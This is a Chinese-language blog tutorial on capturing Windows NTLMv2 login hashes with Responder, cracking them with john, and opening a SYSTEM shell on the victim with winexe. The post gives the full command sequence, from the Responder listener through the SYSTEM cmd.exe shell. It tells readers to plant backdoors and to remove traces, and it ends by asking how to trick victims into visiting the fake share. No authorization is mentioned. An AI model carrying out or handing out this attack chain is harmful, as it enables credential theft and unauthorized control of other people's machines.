不利用系统漏洞拿shell,kali强大工具Responder

最新推荐文章于 2024-08-18 10:38:00 发布
最新推荐文章于 2024-08-18 10:38:00 发布
阅读量1.8k 收藏 12
点赞数 2
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39815966/article/details/109139328
版权

这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听网络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈希值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。

我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可,
当然首先你先需要安装一下python环境和git工具

# apt-get intall build-essential git python-dev

然后是直接从git上克隆到本地

# git clone https://github.com/lgandx/Responder.git

等他下载完成然后需要进行一下更新(如果存在更新的话)

# cd Respondder/

#git pull

会出现一个
Already up-to-date(以更新到最新)

然后我们就可以使用啦!

ok,那我们开始正文!

那些什么-h啥的就不废话了,不会有人真的不知道吧

首先我们启动一个内网监听(需要先cd到responder文件夹下)

# ./Responder.py -wf -I eth0

在这里插入图片描述

-wf 应该是设定web代理 -I 指定网卡,这里我指定的是eth0,我们可以通过ifconfig指令查看自己的ip以及网卡信息,具体怎么添加删除一个网卡这里不再赘述,scdn一搜一大堆

如下图,开始监听了。

然后我们在任何windows系统访问一下虚假的共享文件地址,

<******>\\NOTAREALHOST\NOTARALSHARE\notarealfile.exe

会出现拒绝访问
然后我们的监听端就会出现一些奇妙的信息。

在这里插入图片描述

没错,我们抓到了我们的登录口令hash
然后我们q退出,运行

./DumpHash.py

在这里插入图片描述

会把我们抓到的hash导出成john可以处理的格式

这里我们抓到了两个hash,一个是我本机的登录口令,一个是我的虚拟机windows server 2012R2的登录口令hash
我们的根目录会生成两个txt文件,分别存储的是两个版本的hash,具体是什么版本在我们上一步导出时已经明确指出,如上图:时NTLMV2版本。
在这里插入图片描述

然后我们用我们的john进行指定版本hash爆破,爆破并不是百分百成功的。

john DumpNTLMv2.txt

在这里插入图片描述

现在我们能做的只有等。。。

获取到口令之后我们能干的事情就太多了,看22端口开了嘛,开了直接ssh连接,或者还有更强的,验证目标系统上是否存在ipc共享,如下:

smbclient -U [username]%[password] -L [ipaddress]

在这里插入图片描述

ok可以清楚的看到它开着,然后我们直接用kali自带工具winexe拿shell

winexe -U [username]%[password] --uninstall \\[ipaddress] cmd.exe

或者直接给他提升系统权限

winexe -U [username]%[password] --uninstall --system \\[ipaddress] cmd.exe

注意一定要带参数–unistall 不然会留下你的大猪蹄子的哦
在这里插入图片描述

直接就是系统权限,该留后门留后门,该干嘛干嘛就完事了,一次愉快的旅程,*但是有个问题,怎么诱导它访问共享文件呢?that is a question。 *

Mast3ry
关注
专栏目录
Kali和渗透测试
生活在别处
02-14 3910
文章目录Kali Linux使用U盘/移动硬盘以live方式启动Kali启动Kali和常见操作Kali的使用教程 Kali Linux Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统,预装了许多渗透测试软件。 由Offensive Security Ltd维护和资助。其前身是BackTrack系统。 官网:https://www.kali.org/ 使用U盘/...
Kali Linux高级渗透测试原书第2版》网络渗透测试技术书 无线网络渗透测试详解 黑客攻击与防范实战从入门到精通书
程序员白楠楠的博客
10-08 3103
内容简介: KaliLinux面向专业的渗透测试和审计,集成了大量挑选的检测工具。本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者“杀链”采取的具体步骤。通过阅读本书读者能学习并掌握渗透测试方法和工具。 《Kali Linux高级渗透测试原书第2版》 目录: 1章 基于目标的渗透测试 1 1.1 安全测试的概念 1 1.2 经典漏洞扫描、渗透测试和红队练习的失败 2 1.3 测试方法 2 1.4 Kali Linux介绍——历史和目的 4 1.5 安...
kali使用Metasploit Framework(msf)获取shell
Mrw的博客
04-05 2838
简介 Metasploit Framework是一个编写,测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插...
最新kali之responder
vanony的博客
07-09 732
选项: --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -A, --analyze 分析模式。 此选项使您无需响应即可查看NBT-NS,BROWSER,LLMNR请求。 -I eth0, --interface=eth0 要使用的网络接口,可以将“ ALL”用作所有接口的通配符 -i 10.0.0.21, --ip=10.0.0.21 要使用的本地IP(仅适用于OSX) -e 10.0.0.22, --externalip=10.0.0.22 使
Responder 项目使用教程
最新发布
gitblog_00313的博客
08-18 393
Responder 项目使用教程 ResponderResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP an...
灰帽黑客(第五版):实验10-1 使用Responder获取口令
lmpwang的博客
08-25 283
宿主机Kali:192.168.43.209虚拟机VirtualBox:网络:桥接网络,使虚拟机和宿主机保持在一个网段系统:win10家庭版系统(初始系统使用virtualbox安装过程默认密码changeme!Responder
Responder
09-20 456
操作系统:Kali Linux 工具:responder,john,evil-winrm PS:输入以下命令解决靶场环境无法打开问题
Windows系统下安装kali-linux子系统并右键快捷打开
weixin_61972369的博客
12-14 2113
小白新手自己安装Linux子系统的一些总结
kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结
weixin_39576066的博客
10-24 2785
渗透过程中可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的所以写一个渗透过程中可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali用得好 牢饭准管饱渗透不规范 亲人两行泪先来了解一下Kali(From Wikipdeia)Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Of...
kali 中的内置工具
墨鱼菜鸡
02-11 433
askDingLife is short,use python 博客园|首页|新随笔|新文章|联系|订阅|管理 随笔: 326 文章: 5 评论: 4 引用: 0 kali菜单中各工具功能 kali菜单中各工具功能 一、说明 各工具kali官方简介(竖排):https://tools.k...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4537
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
responder简单用法
qq_44881113的博客
09-08 1482
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix Responder 是一款可以在局域网模拟各种服务器的内网渗透神器 其可以在局域网中进行 DNS 欺骗、LLMNR 欺骗等,实现对用户 NTLM 口令的探测以及 DNS 钓鱼 同时其还可以模拟包括 FTP、HTTP 在内的多
内网渗透之Responder演练(下)
qq_53058639的博客
08-21 142
NTLM中继攻击已经被发现十多年了,要实现NTLM中继攻击,也需要先进行LLMNR/NBNS欺骗,这样,攻击机器就可以充当了中间人,本质上还是由于NTLM认证机制所导致的,且对于最新的NTLMv2认证任然有效,但这个过程并不是没有限制,对于工作组的机器来说,两台机器的密码需要一致才能成功,对于域用户来说,被欺骗用户(发起请求的用户)需要域管理员组里边的用户才可以,NTLM中继成功后的权限为被欺骗用户的权限。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。
使用Responder获取ntlmv2 hash
whojoe的博客
03-03 1383
使用Responder获取ntlmv2 hashResponder配置下载获取ntlmv2hash之后进行爆破获取ntlmv2使用hashcat爆破密码中继获得shell参考文章 Responder配置 下载 https://github.com/lgandx/Responder Responder工具可以污染LLMNR和NBT-NS请求。 在目录下的Responder.conf可以配置启用的模块 如果只需要获取ntlmv2hash使用默认配置即可,之后使用Hashcat进行暴力破解 如果要使用ntlm中
Kali 玩机技巧(杂篇)
辉小鱼的博客
11-03 2106
本文是有关Kali Linux系统的一些简单低级的用法演示,是我个人听课笔记的总结,希望能解决大家的一些问题与困惑!该博文仅限技术学习与交流,若由此发生的一切攻击不法行为,皆与本人无关!
Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder
Start C的博客
04-19 1252
涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80或443端口。这样我们就可以在对方有设置防火墙的情况下远程管理这台服务器) 先看一下旁边的Walkthough,看看本靶场的要求 本实验重点介绍如何利用 Windows 机器上提供的网页上的文件包含漏洞来收集运行 Web 服务器的用户的 NetNTLMv2 质询。我们将使用一个名为 Responder 的实用程
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 7777
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
如何在Windows 10上使用Kali Linux应用程序
weixin_43770745的博客
08-17 2445
总之,Kali Linux是一个神奇的操作系统,被广泛的专业人士所利用。这是一个IT行业的每个人和计算机爱好者都应该知道的操作系统,因为它具有全面的实用性、可靠性和易操作性。对于拥有最佳的Linux知识和对Kali Linux中众多渗透测试工具的能力以及如何加载这些工具有坚定了解的用户来说,这个软件是Windows商店的一个绝妙补充。它通过简化安装过程,使Kali Linux更容易为Windows用户所接受。现在,我希望你能有效地在Windows 10操作系统上快速安装Kali Linux。........
80端口漏洞利用kali
04-02
80端口是HTTP协议默认使用的端口,常用于Web服务器。Kali Linux是一款专门用于渗透测试和网络安全的操作系统。在Kali Linux中,有一些工具可以用于检测和利用80端口的漏洞。 其中一个常用的工具是Metasploit Framework,它是一款功能强大的渗透测试工具。Metasploit Framework提供了多个模块,可以用于检测和利用各种漏洞,包括80端口的漏洞。 要利用80端口的漏洞,首先需要进行漏洞扫描,以确定目标系统是否存在漏洞。可以使用Metasploit Framework中的模块进行扫描,例如使用http_version模块来检测目标系统的HTTP版本,或使用http_put模块来检测目标系统是否允许HTTP PUT方法。 如果发现目标系统存在漏洞,可以使用Metasploit Framework中相应的模块进行利用。例如,使用exploit/multi/http/apache_mod_cgi_bash_env_exec模块来利用Apache mod_cgi漏洞,或使用exploit/multi/http/php_cgi_arg_injection模块来利用PHP CGI漏洞。 需要注意的是,利用漏洞是一项高风险的行为,应该在合法授权和合规的情况下进行。未经授权的渗透测试是违行为,可能导致法律责任。在进行渗透时,请确保遵守相关法律法规和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值